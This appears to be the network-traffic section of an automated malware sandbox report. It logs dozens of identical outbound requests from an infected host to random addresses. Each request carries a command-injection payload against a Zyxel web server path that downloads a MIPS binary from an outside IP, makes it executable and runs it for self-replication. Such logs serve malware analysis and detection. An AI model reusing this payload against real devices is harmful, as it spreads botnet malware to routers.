                                              Jan 29, 2024 07:04:04.297915936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7928192.168.2.1442694207.221.247.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297944069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7929192.168.2.1448860138.243.90.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297972918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7930192.168.2.145730658.26.246.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298026085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7931192.168.2.1435102212.152.130.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298069954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7932192.168.2.1441214105.62.212.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298110962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7933192.168.2.1459116170.239.90.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298135042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7934192.168.2.1437630168.47.26.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298160076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7935192.168.2.1446832147.77.40.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298258066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7936192.168.2.1455730121.172.36.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298309088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7937192.168.2.145931238.216.175.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298340082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7938192.168.2.144206093.241.54.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298382998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7939192.168.2.1443108218.110.41.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298403978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7940192.168.2.145913425.195.77.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298460960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7941192.168.2.1448702113.203.2.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298485994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7942192.168.2.1434632182.154.59.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298505068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7943192.168.2.143770691.52.214.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298553944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7944192.168.2.1440662115.25.49.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298609972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7945192.168.2.143781259.188.26.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298640966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7946192.168.2.1451494172.42.111.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298677921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7947192.168.2.1453604109.180.176.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298727989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7948192.168.2.1456260180.205.145.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298762083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7949192.168.2.145759823.209.62.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298791885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7950192.168.2.1452842200.53.181.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298840046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7951192.168.2.145709252.70.172.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298876047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7952192.168.2.1458546121.250.107.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298893929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7953192.168.2.143905264.93.0.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298938036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7954192.168.2.1456254171.252.11.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.298991919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7955192.168.2.1439166217.84.81.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299016953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7956192.168.2.1457588210.73.202.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299066067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7957192.168.2.1445934161.28.45.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299117088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7958192.168.2.145137463.207.99.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299155951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7959192.168.2.144002271.145.218.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299176931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7960192.168.2.1454864199.24.165.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299222946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7961192.168.2.145181020.43.175.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299247026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7962192.168.2.14378004.231.6.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299299955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7963192.168.2.145731438.204.177.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299335957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7964192.168.2.1460048152.131.134.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299392939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7965192.168.2.143812235.212.149.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299434900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7966192.168.2.144882075.16.89.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299453974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7967192.168.2.1450146156.113.136.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299494028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7968192.168.2.1451870137.61.203.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299539089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7969192.168.2.1440788157.98.202.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299549103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7970192.168.2.1440778162.62.142.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299577951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7971192.168.2.144832281.193.130.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299628973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7972192.168.2.1441112140.128.88.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299670935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7973192.168.2.1446262212.217.245.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299695969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7974192.168.2.1444178176.39.179.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299720049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7975192.168.2.145500651.128.132.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299777031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7976192.168.2.1445140161.69.166.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299818993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7977192.168.2.1447638122.179.92.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299845934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7978192.168.2.1441538199.8.64.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299906969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7979192.168.2.1455666179.187.155.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299931049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7980192.168.2.1459638142.213.205.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.299957991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7981192.168.2.1444082116.162.7.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300004959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7982192.168.2.144063453.83.93.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300045013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7983192.168.2.144888699.141.44.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300087929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7984192.168.2.1456114182.130.174.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300120115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7985192.168.2.1458736138.122.19.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300173044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7986192.168.2.1455974119.240.231.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300196886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7987192.168.2.1433810137.108.56.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300249100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7988192.168.2.143739687.124.57.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300277948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7989192.168.2.1456978196.236.42.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300312042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7990192.168.2.1458100188.41.49.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300369978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7991192.168.2.1447828121.178.126.179443
                                              TimestampBytes transferredDirectionData
